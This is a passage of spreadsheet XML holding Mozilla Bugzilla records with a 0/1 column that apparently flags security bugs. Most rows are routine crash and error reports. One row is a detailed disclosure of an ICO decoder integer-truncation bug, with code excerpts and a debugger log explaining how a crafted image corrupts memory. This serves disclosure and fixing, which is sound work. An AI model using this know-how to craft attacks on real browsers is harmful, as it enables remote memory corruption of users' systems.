        </is>
      </c>
      <c r="N4932" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4932" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4932" t="inlineStr">
        <is>
          <t>[adv-main38+]</t>
        </is>
      </c>
      <c r="Q4932" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4932" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4932" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T4932" t="n">
        <v>1</v>
      </c>
      <c r="U4932" t="n">
        <v>0</v>
      </c>
      <c r="V4932" t="n">
        <v>20</v>
      </c>
      <c r="W4932" t="inlineStr">
        <is>
          <t>Created attachment 8591428
testcase
Assertion failure: val.isObject() (invalid type of jsval!), at js/xpconnect/src/XPCVariant.cpp:301</t>
        </is>
      </c>
      <c r="X4932" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4933">
      <c r="A4933" t="n">
        <v>1467280</v>
      </c>
      <c r="B4933" t="inlineStr">
        <is>
          <t>2018-06-06 14:11:17 -0700</t>
        </is>
      </c>
      <c r="C4933" t="inlineStr">
        <is>
          <t>[traceback] RawCrash API endpoint handles malformed crash ids poorly</t>
        </is>
      </c>
      <c r="D4933" t="inlineStr">
        <is>
          <t>2018-06-19 10:44:48 -0700</t>
        </is>
      </c>
      <c r="E4933" t="n">
        <v>1</v>
      </c>
      <c r="F4933" t="n">
        <v>1</v>
      </c>
      <c r="G4933" t="n">
        <v>4</v>
      </c>
      <c r="H4933" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4933" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4933" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K4933" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4933" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4933" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4933" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4933" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4933" t="inlineStr"/>
      <c r="Q4933" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4933" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4933" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4933" t="n">
        <v>1</v>
      </c>
      <c r="U4933" t="n">
        <v>0</v>
      </c>
      <c r="V4933" t="n">
        <v>3</v>
      </c>
      <c r="W4933" t="inlineStr">
        <is>
          <t>RawCrash API handles malformed crash ids poorly. It should try to validate the crash id and if it's not valid, throw a 400 without doing anything else. Instead, it's getting all the way to the key-building code which gets sad and raises an error that the RawCrash model doesn't understand.
Sentry url: https://sentry.prod.mozaws.net/operations/socorro-new-prod/issues/4379873/
Traceback:
"""
CrashidMissingDatestamp: 54 is missing datestamp
  File "django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "django/views/decorators/csrf.py", line 58, in wrapped_view
    return view_func(*args, **kwargs)
  File "ratelimit/decorators.py", line 30, in _wrapped
    return fn(*args, **kw)
  File "crashstats/crashstats/decorators.py", line 112, in inner
    response = view(request, *args, **kwargs)
  File "crashstats/crashstats/utils.py", line 340, in wrapper
    response = f(request, *args, **kw)
  File "crashstats/crashstats/utils.py", line 46, in wrapper
    response = f(request, *args, **kw)
  File "crashstats/api/views.py", line 234, in model_wrapper
    result = function(**form.cleaned_data)
  File "crashstats/crashstats/models.py", line 822, in get
    result = super(RawCrash, self).get(**kwargs)
  File "crashstats/crashstats/models.py", line 338, in get
    return self._get(expect_json=expect_json, **kwargs)
  File "crashstats/crashstats/models.py", line 396, in _get
    expect_json=expect_json,
  File "crashstats/crashstats/models.py", line 180, in inner
    result = method(*args, **kwargs)
  File "crashstats/crashstats/models.py", line 270, in fetch
    result = implementation_method(**params)
  File "socorro/external/boto/crash_data.py", line 78, in get
    return get(params.uuid)
  File "socorro/external/boto/crashstorage.py", line 197, in get_raw_crash
    self.config.json_object_hook
  File "socorro/database/transaction_executor.py", line 105, in __call__
    result = function(connection, *args, **kwargs)
  File "socorro/external/boto/crashstorage.py", line 182, in do_get_raw_crash
    "raw_crash"
  File "socorro/external/boto/connection_context.py", line 210, in fetch
    all_keys = self.build_keys(self.config.prefix, name_of_thing, id)
  File "socorro/external/boto/connection_context.py", line 144, in build_keys
    date = self._get_datestamp(crashid).strftime('%Y%m%d')
  File "socorro/external/boto/connection_context.py", line 119, in _get_datestamp
    raise CrashidMissingDatestamp('%s is missing datestamp' % crashid)
"""
This bug covers fixing that so it's throwing HTTP 400s and not HTTP 500s which page everyone.</t>
        </is>
      </c>
      <c r="X4933" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4934">
      <c r="A4934" t="n">
        <v>775794</v>
      </c>
      <c r="B4934" t="inlineStr">
        <is>
          <t>2012-07-19 17:42:48 -0700</t>
        </is>
      </c>
      <c r="C4934" t="inlineStr">
        <is>
          <t>nsICODecoder transparency bitmask memory corruption</t>
        </is>
      </c>
      <c r="D4934" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:51 -0700</t>
        </is>
      </c>
      <c r="E4934" t="n">
        <v>1</v>
      </c>
      <c r="F4934" t="n">
        <v>1</v>
      </c>
      <c r="G4934" t="n">
        <v>3</v>
      </c>
      <c r="H4934" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4934" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4934" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K4934" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4934" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4934" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4934" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4934" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4934" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q4934" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4934" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4934" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T4934" t="n">
        <v>1</v>
      </c>
      <c r="U4934" t="n">
        <v>0</v>
      </c>
      <c r="V4934" t="n">
        <v>14</v>
      </c>
      <c r="W4934" t="inlineStr">
        <is>
          <t>Created attachment 644093
Sample file triggering the bug
This bug is present in the nsICODecoder class, when processing the transparency bitmask.
It allows a remote attacker to write random memory, hence the critical severity.
User action is needed in the following form: the user needs to open a web page containing a specially crafted image.
First, a little summary of how Firefox processes a BMP embedded inside an ICO image:
-It reads the ICONDIRENTRY
-It reads the image header
-It divides the image height by 2
-It passes the image header and the image data to a BMP decoder
-It applies the transparency bitmask to the rendered image.
Before passing the BMP image header and data to the BMP decoder, the nsICODecoder checks that the properties in the ICONDIRENTRY structure are consistent with the properties in the BMP header, and fixes them if necessary.
Since the maximum height of an icon is 256, it checks that the BMP header height is no more than 256 (the image is considered invalid if it exceeds 256).
Also, if the height in the ICONDIRENTRY structure and the height in the BMP header don't match, then the height in the BMP header is trusted over the height in the ICONDIRENTRY structure.
Here is the code responsible for doing this, in the file nsICODecoder.cpp:
166 // A BMP inside of an ICO has *2 height because of the AND mask
167 // that follows the actual bitmap.  The BMP shouldn't know about
168 // this difference though.
169 bool
170 nsICODecoder::FixBitmapHeight(PRInt8 *bih) 
171 {
172   // Get the height from the BMP file information header
173   PRInt32 height;
174   memcpy(&amp;height, bih + 8, sizeof(height));
175   height = LITTLE_TO_NATIVE32(height);
176 
177   // The bitmap height is by definition * 2 what it should be to account for
178   // the 'AND mask'. It is * 2 even if the `AND mask` is not present.
179   height /= 2;
180 
181   if (height &gt; 256) {
182     return false;
183   }
184 
185   // We should always trust the height from the bitmap itself instead of 
186   // the ICO height.  So fix the ICO height.
187   if (height == 256) {
188     mDirEntry.mHeight = 0;
189   } else {
190     mDirEntry.mHeight = (PRInt8)height;
191   }
192 
193   // Fix the BMP height in the BIH so that the BMP decoder can work properly
194   height = NATIVE32_TO_LITTLE(height);
195   memcpy(bih + 8, &amp;height, sizeof(height));
196   return true;
197 }
The mDirEntry.mHeight variable is then used to calculate the pixel offset when applying the transparency bitmask. Note: GetRealHeight() returns mDirEntry.mHeight:
542           mCurLine = GetRealHeight();
[...]
575             PRUint32* decoded = imageData + mCurLine * GetRealWidth();
576             PRUint32* decoded_end = decoded + GetRealWidth();
577             PRUint8* p = mRow, *p_end = mRow + rowSize; 
578             while (p &lt; p_end) {
579               PRUint8 idx = *p++;
580               for (PRUint8 bit = 0x80; bit &amp;&amp; decoded&lt;decoded_end; bit &gt;&gt;= 1) {
581                 // Clear pixel completely for transparency.
582                 if (idx &amp; bit) {
583                   *decoded = 0;
584                 }
585                 decoded++;
586               }
587             }
The vulnerability is in the nsICODecoder::FixBitmapHeight function.
The "height" variable is declared as a PRInt32, which is a signed 32 bits integer.
Consequently, if the "height" field of the BMP header is negative, it will pass the check at line 181:
181   if (height &gt; 256) {
182     return false;
183   }
It will then be truncated to fit into a 8 bits integer, namely mDirEntry.mHeight:
187   if (height == 256) {
188     mDirEntry.mHeight = 0;
189   } else {
190     mDirEntry.mHeight = (PRInt8)height;
191   }
mDirEntry.mHeight is an unsigned 8 bits integer, so when it is assigned to mCurLine, mCurLine can be higher than the real height of the image, causing the processing of the transparency bitmask to write past the imageData array, resulting in memory corruption.
This is possible because negative heights in BMP headers are acceptable, so the BMP decoder will process the image normally.
To illustrate what happens with an example, we'll take a 32x8 pixels image. We have to double the initial height to account for the transparency bitmask, and make it negative, so the "height" value in the BMP header will be -16, which is 0xfffffff0.
When we enter the nsICODecoder::FixBitmapHeight function, here is what happens:
-First, the "height" is divided by 2. Its new value is -8, or 0xfffffff8.
-The check at line 181 is passed, since -8 is not superior to 256.
-mDirEntry.mHeight is assigned the value of 0xf8 (which is 0xfffffff8 truncated to 8 bits).
-The BMP decoder processes the BMP data, allocating an array large enough to contain our 32x8 pixels image.
-The mCurLine variable is assigned the value of mDirEntry.mHeight. Since mDirEntry.mHeight is an unsigned byte, mCurLine is equal to 0x000000f8, which is 248 in decimal.
-nsICODecoder uses mCurLine to calculate an offset to the image data array. Since 248 is larger than the image real height of 8, data is written past the end of the imageData array, causing memory corruption (at line 583).
The attached sample ICO file triggers the vulnerability.
Here is a WinDbg log when exploiting the vulnerability in Firefox on Windows XP:
(540.564): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=071a7c80 ebx=01f03b64 ecx=01f03b63 edx=000000ff esi=071a7bc0 edi=05f86530
eip=0113834a esp=0012cc68 ebp=0012cca8 iopl=0         nv up ei ng nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010282
e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\decoders\nsicodecoder.cpp(583)
xul!mozilla::imagelib::nsICODecoder::WriteInternal+0x60a:
0113834a c70600000000    mov     dword ptr [esi],0    ds:0023:071a7bc0=????????
0:000&gt; k
ChildEBP RetAddr  
0012cca8 010de143 xul!mozilla::imagelib::nsICODecoder::WriteInternal+0x60a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\decoders\nsicodecoder.cpp @ 583]
0012ccc8 0113410e xul!mozilla::imagelib::RasterImage::WriteToDecoder+0x3e [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\rasterimage.cpp @ 2370]
0012cce4 010b9526 xul!mozilla::imagelib::RasterImage::DecodeSomeData+0x35 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\rasterimage.cpp @ 2702]
0012cd3c 010f6ba2 xul!mozilla::imagelib::imgDecodeWorker::Run+0xfe [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\rasterimage.cpp @ 2819]
0012cd50 010f6be3 xul!mozilla::imagelib::RasterImage::AddSourceData+0xcf [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\rasterimage.cpp @ 1496]
0012cda4 0104cfb6 xul!mozilla::imagelib::RasterImage::WriteToRasterImage+0x15 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\rasterimage.cpp @ 2917]
0012cda4 0104cfb6 xul!imgRequest::OnDataAvailable+0x466 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\imgrequest.cpp @ 1166]
0012d004 010f1121 xul!imgRequest::OnDataAvailable+0x466 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\imgrequest.cpp @ 1166]
0012d024 010a7f3a xul!ProxyListener::OnDataAvailable+0x26 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\imgloader.cpp @ 2091]
0012d050 010981c3 xul!nsBaseChannel::OnDataAvailable+0x49 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\netwerk\base\src\nsbasechannel.cpp @ 774]
0012d094 0109807a xul!nsInputStreamPump::OnStateTransfer+0xd3 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\netwerk\base\src\nsinputstreampump.cpp @ 512]
0012d0a8 01097df3 xul!nsInputStreamPump::OnInputStreamReady+0x6d [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\netwerk\base\src\nsinputstreampump.cpp @ 409]
0012d0b8 00fbee5f xul!nsInputStreamReadyEvent::Run+0x1d [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\xpcom\io\nsstreamutils.cpp @ 115]
0012d110 00fe3e9e xul!nsThread::ProcessNextEvent+0x19f [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\xpcom\threads\nsthread.cpp @ 666]
0012d144 011bc8e2 xul!mozilla::ipc::MessagePump::Run+0x6e [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\ipc\glue\messagepump.cpp @ 110]
0012d17c 011bc8b3 xul!MessageLoop::RunHandler+0x21 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\ipc\chromium\src\base\message_loop.cc @ 202]
0012d198 011991b8 xul!MessageLoop::Run+0x15 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\ipc\chromium\src\base\message_loop.cc @ 176]
0012d1a4 011bc9b0 xul!nsBaseAppShell::Run+0x34 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\widget\src\xpwidgets\nsbaseappshell.cpp @ 191]
0012f0f8 011bc9f2 xul!nsAppShell::Run+0x4d [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\widget\src\windows\nsappshell.cpp @ 258]
0012f4a4 00401796 xul!nsAppStartup::Run+0x1e [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\toolkit\components\startup\nsappstartup.cpp @ 221]
0012ff7c 00401ab0 firefox!wmain+0x796 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\toolkit\xre\nswindowswmain.cpp @ 107]
0012ffc0 7c817077 firefox!__tmainCRTStartup+0x10f [f:\sp\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 594]</t>
        </is>
      </c>
      <c r="X4934" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4935">
      <c r="A4935" t="n">
        <v>122418</v>
      </c>
      <c r="B4935" t="inlineStr">
        <is>
          <t>2002-01-29 11:13:56 -0800</t>
        </is>
      </c>
      <c r="C4935" t="inlineStr">
        <is>
          <t>setting attachment status fails</t>
        </is>
      </c>
      <c r="D4935" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:28 -0800</t>
        </is>
      </c>
      <c r="E4935" t="n">
        <v>1</v>
      </c>
      <c r="F4935" t="n">
        <v>1</v>
      </c>
      <c r="G4935" t="n">
        <v>4</v>
      </c>
      <c r="H4935" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4935" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4935" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K4935" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L4935" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4935" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4935" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4935" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4935" t="inlineStr"/>
      <c r="Q4935" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4935" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4935" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T4935" t="n">
        <v>1</v>
      </c>
      <c r="U4935" t="n">
        <v>0</v>
      </c>
      <c r="V4935" t="n">
        <v>15</v>
      </c>
      <c r="W4935" t="inlineStr">
        <is>
          <t>Software error:
Attempted to send tainted string 'INSERT INTO attachstatuses (attach_id, statusid) VALUES (49, 1)' to the database at globals.pl line 216.
For help, please send mail to the webmaster (root@localhost), giving this error message and the time and date of the error.
-
cvs tip, w/ and w/o the patch to remove the old attachment system.
-
Administer Attachment Statuses
Name Description Sort Key Product Action(s)
needstesting needs testing 5 test Edit Delete
Create</t>
        </is>
      </c>
      <c r="X4935" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4936">
      <c r="A4936" t="n">
        <v>1219330</v>
      </c>
      <c r="B4936" t="inlineStr">
        <is>
          <t>2015-10-28 10:16:42 -0700</t>
        </is>
      </c>
      <c r="C4936" t="inlineStr">
        <is>
          <t>crash in mozilla::layers::TextureClient::CreateForYCbCr with a 0xffffffffe5e5e609 address</t>
        </is>
      </c>
      <c r="D4936" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:01 -0700</t>
        </is>
      </c>
      <c r="E4936" t="n">
        <v>1</v>
      </c>
      <c r="F4936" t="n">
        <v>1</v>
      </c>
      <c r="G4936" t="n">
        <v>3</v>
      </c>
      <c r="H4936" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4936" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4936" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4936" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4936" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4936" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N4936" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4936" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4936" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.5-][post-critsmash-triage][adv-main43+]</t>
        </is>
      </c>
      <c r="Q4936" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4936" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4936" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T4936" t="n">
        <v>1</v>
      </c>
      <c r="U4936" t="n">
        <v>0</v>
      </c>
      <c r="V4936" t="n">
        <v>50</v>
      </c>
      <c r="W4936" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]:
[Tracking Requested - why for this release]:
This bug was filed from the Socorro interface and is 
report bp-3d56b4aa-6787-47bf-8585-6b15a2151028.
=============================================================
Stack Trace:
0 	xul.dll 	mozilla::layers::TextureClient::CreateForYCbCr(mozilla::layers::ISurfaceAllocator*, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::StereoMode, mozilla::layers::TextureFlags) 	gfx/layers/client/TextureClient.cpp
1 	xul.dll 	mozilla::layers::SharedPlanarYCbCrImage::Allocate(mozilla::layers::PlanarYCbCrData&amp;) 	gfx/layers/ipc/SharedPlanarYCbCrImage.cpp
2 	xul.dll 	mozilla::layers::SharedPlanarYCbCrImage::SetData(mozilla::layers::PlanarYCbCrData const&amp;) 	gfx/layers/ipc/SharedPlanarYCbCrImage.cpp
3 	xul.dll 	mozilla::VideoData::Create(mozilla::VideoInfo const&amp;, mozilla::layers::ImageContainer*, mozilla::layers::Image*, __int64, __int64, __int64, mozilla::VideoData::YCbCrBuffer const&amp;, bool, __int64, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) 	dom/media/MediaData.cpp
4 		@0x20c0f83f 	
It looks like all those stacks are cut off with a hex address at that point.
Crashes with this signature have been present in 42 betas and newer nightly/dev-edition builds with low frequency, but in early 42 RC data, this is the #3 signature with ~2.2% of the overall data.
The address is always 0xffffffffe5e5e609, which points to the e5e5... pattern that is now our memory poison and the eax register is the exact poison "0xe5e5e5e5" so this smells like a UAF and I'm marking this as security.
The signature itself does appear a single-digit amount of times in 41 but not with a poison address, so I consider 41 unaffected. The 43 and 44 cases do have the poison as well, though.
It affects all versions of Windows from XP to 10, and 32bit as well as 64bit builds, in the latter case the rax register is the poison "0xe5e5e5e5e5e5e5e5" (while the address is [mis]reported as 0xffffffffffffffff).
Milan, is this something that looks like a graphics or like a media bug? We should take a look today to find out if this is something we need to get fixed for the 42 release (we are in RC already) or not.</t>
        </is>
      </c>
      <c r="X4936" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4937">
      <c r="A4937" t="n">
        <v>1339381</v>
      </c>
      <c r="B4937" t="inlineStr">
        <is>
          <t>2017-02-14 02:45:19 -0800</t>
        </is>
      </c>
      <c r="C4937" t="inlineStr">
        <is>
          <t>[release-notifications] No key 'log_url' in json response for buildbot-bridge</t>
        </is>
      </c>
      <c r="D4937" t="inlineStr">
        <is>
          <t>2017-03-09 09:27:05 -0800</t>
        </is>
      </c>
      <c r="E4937" t="n">
        <v>1</v>
      </c>
      <c r="F4937" t="n">
        <v>1</v>
      </c>
      <c r="G4937" t="n">
        <v>5</v>
      </c>
      <c r="H4937" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4937" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4937" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K4937" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4937" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4937" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4937" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4937" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4937" t="inlineStr">
        <is>
          <t>[lang=python][good first bug]</t>
        </is>
      </c>
      <c r="Q4937" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4937" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4937" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4937" t="n">
        <v>1</v>
      </c>
      <c r="U4937" t="n">
        <v>0</v>
      </c>
      <c r="V4937" t="n">
        <v>6</v>
      </c>
      <c r="W4937" t="inlineStr">
        <is>
          <t>Since release-notifications sends logs to Pappertrail (bug 1334092), this error comes out quite often (several times per release).
Like bug 1334092, it seems downloading the JSON one more time would do the trick.
Here are some logs:
&gt; Feb 10 13:25:09 heroku-release-notifications app/worker.1: 2017-02-10 21:25:08,927 - pulsenotify.util - INFO - Fetching task 3yA29qyZTQq48G3wfGAOMQ from Taskcluster 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: 2017-02-10 21:25:10,822 - aiohttp.client - WARNING - Attempt to decode JSON with unexpected mimetype: text/plain; charset=utf-8 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: 2017-02-10 21:25:10,919 - pulsenotify.consumer - ERROR - No key 'log_url' in json response for buildbot-bridge 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: Traceback (most recent call last): 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1:   File "/app/pulsenotify/consumer.py", line 292, in get_bbb_log 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1:     log.debug('bbb actual log filename: %s', json_resp['log_url'][0]) 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: KeyError: 'log_url' 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: 2017-02-10 21:25:11,019 - pulsenotify.consumer - ERROR - No key 'log_url' in json response for buildbot-bridge 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: Traceback (most recent call last): 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1:   File "/app/pulsenotify/consumer.py", line 292, in get_bbb_log 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1:     log.debug('bbb actual log filename: %s', json_resp['log_url'][0]) 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: KeyError: 'log_url' 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: 2017-02-10 21:25:11,116 - pulsenotify.consumer - ERROR - No key 'log_url' in json response for buildbot-bridge 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: Traceback (most recent call last): 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1:   File "/app/pulsenotify/consumer.py", line 292, in get_bbb_log 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1:     log.debug('bbb actual log filename: %s', json_resp['log_url'][0]) 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: KeyError: 'log_url' 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: 2017-02-10 21:25:11,217 - pulsenotify.consumer - ERROR - No key 'log_url' in json response for buildbot-bridge 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: Traceback (most recent call last): 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1:   File "/app/pulsenotify/consumer.py", line 292, in get_bbb_log 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1:     log.debug('bbb actual log filename: %s', json_resp['log_url'][0]) 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: KeyError: 'log_url' 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: 2017-02-10 21:25:11,319 - pulsenotify.consumer - ERROR - No key 'log_url' in json response for buildbot-bridge 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: Traceback (most recent call last): 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1:   File "/app/pulsenotify/consumer.py", line 292, in get_bbb_log 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1:     log.debug('bbb actual log filename: %s', json_resp['log_url'][0]) 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: KeyError: 'log_url' 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: 2017-02-10 21:25:11,320 - pulsenotify.consumer - WARNING - Could not retrieve log for Task(id=3yA29qyZTQq48G3wfGAOMQ, status=task-exception) run {'scheduled': '2017-02-07T11:26:10.360Z', 'reasonResolved': 'deadline-exceeded', 'runId': 1, 'state': 'exception', 'reasonCreated': 'rerun', 'resolved': '2017-02-10T21:24:58.666Z'}. 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: 2017-02-10 21:25:11,320 - pulsenotify.plugins.irc - INFO - Notified with IRC for Task(id=3yA29qyZTQq48G3wfGAOMQ, status=task-exception) 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: 2017-02-10 21:25:11,352 - botocore.vendored.requests.packages.urllib3.connectionpool - INFO - Starting new HTTPS connection (1): mozilla-release-logs.s3.amazonaws.com 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: 2017-02-10 21:25:11,439 - pulsenotify.plugins.log_collect - INFO - log_collect: log for Task(id=3yA29qyZTQq48G3wfGAOMQ, status=task-exception) uploaded to Amazon S3 
&gt; Feb 10 13:25:11 heroku-release-notifications app/worker.1: 2017-02-10 21:25:11,456 - botocore.vendored.requests.packages.urllib3.connectionpool - INFO - Starting new HTTPS connection (1): email.us-west-2.amazonaws.com 
&gt; Feb 10 13:25:12 heroku-release-notifications app/worker.1: 2017-02-10 21:25:11,917 - pulsenotify.plugins.ses - INFO - Notified with SES for Task(id=3yA29qyZTQq48G3wfGAOMQ, status=task-exception) 
&gt; Feb 10 13:25:12 heroku-release-notifications app/worker.1: 2017-02-10 21:25:11,922 - pulsenotify.consumer - INFO - Acknowledging consumption of Task(id=3yA29qyZTQq48G3wfGAOMQ, status=task-exception)</t>
        </is>
      </c>
      <c r="X4937" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4938">
      <c r="A4938" t="n">
        <v>1510345</v>
      </c>
      <c r="B4938" t="inlineStr">
        <is>
          <t>2018-11-27 09:50:19 -0800</t>
        </is>
      </c>
